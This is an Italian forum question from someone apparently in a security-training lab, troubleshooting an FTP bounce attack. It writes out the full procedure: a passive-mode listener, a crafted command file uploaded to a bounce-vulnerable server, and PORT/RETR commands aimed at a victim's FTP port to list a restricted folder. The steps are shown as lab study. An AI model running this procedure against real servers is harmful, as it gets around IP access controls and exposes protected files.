Sto studiando sicurezza in un laboratorio di formazione e sto cercando di implementare l'infame attacco FTP-rimbalzo. Userò un server FTP remoto (chiamato qui BOUNCE) per accedere a una cartella sulla macchina VICTIM che è proibita per il mio indirizzo IP. Non so se la macchina VICTIM consentirà l'accesso alla cartella vietata su BOUNCE, ma vale comunque la pena provare:).
Ecco cosa faccio:
Inizio il mio server pure-ftp e mi connetto ad esso:
service pure-ftpd start
~# ftp My_IP 21
ftp> USER my_own_username
Quindi, dico al mio server di passare in modalità passiva, risponde con un indirizzo IP (che è il mio indirizzo IP) e una PORTA con una forma come: (F, F, F, F, X, X) Ne prendo nota per dopo.
ftp> quote "pasv"
Entering Passive Mode (F,F,F,F,X,X)
E infine, dico al mio server di accettare i dati dal canale dati e li memorizziamo nel file foobar , se non esiste, il server ne crea uno.
ftp> quote "stor foobar"
Dopo questo, il mio server (che è in modalità passiva ora) si bloccherà ...
Ora utilizzerò un server vulnerabile FTP-bounce (che ho trovato grazie a nmap che mostra il messaggio "Ftp-Bounce Working!") che chiamerò "Bounce". Se ho capito bene, quest'ultimo è in grado di connettersi ad altri server FTP usando il comando PORT. Fortunatamente posso connettermi a Bounce in modo anonimo e caricare alcuni file su di esso utilizzando il comando PUT.
Successivamente, importerò il seguente file su Bounce:
user anonymous
pass whatyouwant
cd /restricted-folder
port F,F,F,F,X,X
ls
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
...
Verrà quindi caricato da Bounce a Victim Machine per consentire a quest'ultimo di eseguire le istruzioni in.
Lo faccio con quegli ultimi comandi (ancora su Bounce):
put instrs
quote "port C,C,C,C,0,21"
quote "retr instrs"
Dove C,C,C,0,21
è l'IP della macchina vittima (chiamiamola VICTIM). (Quindi si connetterà a VICTIM e dirà di eseguire l'istruzione nel file instrs, se ho capito correttamente).
Problema : subito dopo il comando quote "retr instrs
ottengo il seguente errore: 501 Cannot RETR. Error
Quindi, mi chiedo, è VITTIMA o BOUNCE che impedisce anche il comando RETR di funzionare? Dimmi anche, se pensi di aver frainteso qualcosa. Grazie mille per te attenzione.